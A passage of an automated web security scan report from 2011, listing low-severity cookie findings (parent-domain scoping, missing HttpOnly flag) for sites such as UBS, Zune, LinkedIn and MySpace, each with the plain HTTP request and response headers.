The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/shared/thickbox.css HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb6615b.8526e51e; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 17 Jun 2010 12:08:12 GMT
Cache-Control: max-age=1881
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 4176

/* ----------------------------------------------------------------------------------------------------------------*/
/* ---------->>> global settings needed for thickbox <<<-------------------------
...[SNIP]...

6.29. http://www.zune.net/en-US/legal/codeOfConduct.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/legal/codeOfConduct.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/legal/codeOfConduct.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 27495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.30. http://www.zune.net/en-US/legal/termsofservice.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/legal/termsofservice.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/legal/termsofservice.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S101
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 94559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.31. http://www.zune.net/en-US/press/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/press/default.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/press/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S503
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 33125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.32. http://www.zune.net/en-US/support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/support HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.33. http://www.zune.net/en-US/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/support/ HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S501
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.34. http://www.zune.net/en-us/legal/safety.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/legal/safety.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/legal/safety.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.35. http://www.zune.net/en-us/newsletter/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/newsletter/default.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/newsletter/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 28717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.36. http://www.zune.net/en-us/products/zuneonxbox/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/products/zuneonxbox/default.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/products/zuneonxbox/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S101
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 30517


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.37. http://www.zune.net/en-us/support/accessibility/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/support/accessibility/default.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/support/accessibility/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S104
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

7. Cookie without HttpOnly flag set

There are 46 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



7.1. https://selfservice.ibb.ubs.com/idm/user/ubs/ubs_selfServiceWelcome.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://selfservice.ibb.ubs.com
Path:   /idm/user/ubs/ubs_selfServiceWelcome.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idm/user/ubs/ubs_selfServiceWelcome.jsp HTTP/1.1
Host: selfservice.ibb.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 06 Jul 2011 14:07:45 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.15 mod_perl/1.29 mod_ssl/2.8.14 OpenSSL/0.9.7b
Content-Language: en
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D8A446E01118B6D3FECEC5B8203F8A68; Path=/idm; Secure
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html40/loose.dtd">
<html>
<head>



...[SNIP]...

7.2. http://www.armaniexchange.com/category/womens/sunglasses.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.armaniexchange.com
Path:   /category/womens/sunglasses.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category/womens/sunglasses.do HTTP/1.1
Host: www.armaniexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Wed, 06 Jul 2011 14:07:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:07:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: customer=none; path=/; expires=Fri, 19-Jul-2013 14:07:28 GMT
Set-Cookie: basket=none; path=/; expires=Wed, 20-Jul-2011 14:07:28 GMT
Set-Cookie: JSESSIONID=b4cv-ltssK9foaMX-d; path=/
Content-Length: 174474


        <script language="JavaScript">
// Disable edit cell tab.
parent.editCell.cl
...[SNIP]...

7.3. http://www.armaniexchange.com/storelocator.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.armaniexchange.com
Path:   /storelocator.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storelocator.do HTTP/1.1
Host: www.armaniexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Wed, 06 Jul 2011 14:07:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:07:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: customer=none; path=/; expires=Fri, 19-Jul-2013 14:07:29 GMT
Set-Cookie: basket=none; path=/; expires=Wed, 20-Jul-2011 14:07:29 GMT
Set-Cookie: JSESSIONID=cnJmPlEr-4b-hiMX-d; path=/
Content-Length: 52997


<script language="JavaScript">
// Disable edit cell tab.
parent.editCell.className = "tab-button-dis";

function saveForm() {
location.replace
...[SNIP]...

7.4. http://www.bebo.com/c/share

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/share HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Location: http://www.bebo.com/PleaseSignIn.jsp?Page=c/share&popup=0
Content-Type: text/html; charset=UTF-8
Content-Length: 95
Date: Wed, 06 Jul 2011 11:21:00 GMT
Connection: close
Set-Cookie: bvid=bcfc7676-2f08-4e18-91ba-a0a7a2b05abd|1309951260831; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:00 GMT
Set-Cookie: bdaysession=59cab38c07f11804620907511; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112100; domain=.bebo.com; path=/

The URL has moved <a href="http://www.bebo.com/PleaseSignIn.jsp?Page=c/share&popup=0">here</a>

7.5. http://www.benjaminsterling.com/experiments/jqShuffle/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.benjaminsterling.com
Path:   /experiments/jqShuffle/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experiments/jqShuffle/ HTTP/1.1
Host: www.benjaminsterling.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 06 Jul 2011 11:21:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://benjaminsterling.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b31036217bd54c298a95d5cae2277bf2; path=/
Last-Modified: Wed, 06 Jul 2011 11:21:27 GMT
Location: http://benjaminsterling.com/experiments/jqShuffle/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.6. http://www.diigo.com/post

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.diigo.com
Path:   /post

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: www.diigo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Wed, 06 Jul 2011 14:07:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Sat, 02 Jul 2011 10:07:33 GMT
Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Sat, 02 Jul 2011 10:07:33 GMT
Set-Cookie: _smasher_session=a9bd786efe2dc9056666343ce77be031; domain=diigo.com; path=/
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Location: https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost
X-Runtime: 0.00062
Content-Length: 142
Cache-Control: no-cache

<html><body>You are being <a href="https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost">redirected</a>.</body></html>

7.7. http://www.evernote.com/clip.action

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.evernote.com
Path:   /clip.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clip.action?url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US HTTP/1.1
Host: www.evernote.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: shard=deleteme; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cookieTestValue=1309951281866; Version=1; Max-Age=378432000; Expires=Mon, 03-Jul-2023 11:21:21 GMT; Path=/
Set-Cookie: JSESSIONID=533B63D3D80594249497C75E3B0979D4; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Wed, 06 Jul 2011 11:21:21 GMT
Connection: close
Server: Evernote/1.0
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...

7.8. http://www.linkedin.com/shareArticle

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:93DIfn6pEjjvFpbrPCwqLaeaMjj-1DOra9DURRE1_gdw92SrsI2wg9:1309951282:71f9fdf64b90fac7cb9339589e3ed534ca703d1e"; Version=1; Max-Age=1799; Expires=Wed, 06-Jul-2011 11:51:21 GMT; Path=/
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1274968938822400364"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: bcookie="v=1&96d058ca-285d-4b2d-96c8-f61d525270fc"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 11:21:21 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Wed, 06-Jul-2011 11:53:13 GMT;path=/;httponly
Content-Length: 8493

<!DOCTYPE html>
<html lang="en">
<head>


<script type="text/jav
...[SNIP]...

7.9. http://www.myspace.com/Modules/PostTo/Pages/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: b6a926eb7268a3c3750ad2730c953a9795441bd2feec1fa4
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634455240459655487&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Wed, 13-Jul-2011 11:40:45 GMT; path=/
Set-Cookie: SessionDDF2=ErqkO3ydTaOccqIxl60+kHYCyG0t5ioyReAa6cduhLOm8nYvFSCSuhZtTbrUe7jHEB2KQMtn1NeMim1gRF15jw==; domain=.myspace.com; expires=Sun, 06-Jul-2031 11:40:45 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: My Pet Hamster
Date: Wed, 06 Jul 2011 11:40:45 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

7.10. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:05:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=hgig1lfiopk95ql3u4pi3mr831; expires=Fri, 29-Jul-2011 17:39:18 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 14:02:03 GMT
ETag: "1a6140a90b059f012afb34dbb1337aac"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7275
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

7.11. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=nckibgvdkif5pk4ruq9eiask34; expires=Fri, 29-Jul-2011 15:10:32 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 11:32:17 GMT
ETag: "88cb710a049c0b384cfdb46952931378"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

7.12. http://segments.adap.tv/data/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=lotame&type=gif&audid=2723&add=true HTTP/1.1
